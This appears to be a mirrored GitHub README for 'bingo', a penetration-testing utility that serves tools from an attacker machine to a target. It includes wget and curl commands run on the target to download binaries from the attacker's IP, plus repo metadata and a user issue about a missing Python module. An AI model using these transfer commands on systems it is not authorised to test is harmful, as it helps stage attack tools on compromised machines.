Giter Site home page Giter Site logo

bingo's Introduction

bingo - Penetration Testing Toolkit

bingo facilitates the distribution and execution of essential tools for penetration testing, allowing the attacker to fetch them on the target machine without internet access on it.

Installation

  1. Clone the Repository:
    git clone https://github.com/luskabol/bingo.git
    cd bingo
    
  2. Install dependencies
    pip install -r requirements.txt
    

Usage

  1. On the attacker machine:

    python3 bingo.py
  2. On the target machine:

    wget http://{your-internal-IP}:8000/get/{binary-name} -O {path-to-output-file}

    If the target doesn't have wget:

    curl http://{your-internal-IP}:8000/get/{binary-name} -o {path-to-output-file}
  • Replace {your-internal-IP} with the attacker's machine IP.

  • Replace {binary-name} with the name of the binary you want to get, check bingo.yaml for available binaries.

  • Replace {path-to-output-file} with the location where you want to save the binary.

bingo's People

Contributors

luskabol avatar zetsubcontent avatar beescuit avatar

Stargazers

Vivaldo Chagas avatar 0xT0k0 avatar Luidiblu avatar rapha avatar Dur4ndal avatar Carlos Vieira avatar biscoito avatar

Watchers

Carlos Vieira avatar  avatar

Forkers

beescuit zetsuhq

bingo's Issues

Bingo error on startup

Hi,

uen i trai to ran bingo.py, the paiton show tis autiputi:

Traceback (most recent call last):
  File "/home/carlos/bingo/bingo.py", line 4, in <module>
    from netifaces import interfaces, ifaddresses, AF_INET
ModuleNotFoundError: No module named 'netifaces'

i ran bifore pip3 install -r requirements.txt but tis noti worki

can iu helpi mi ?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.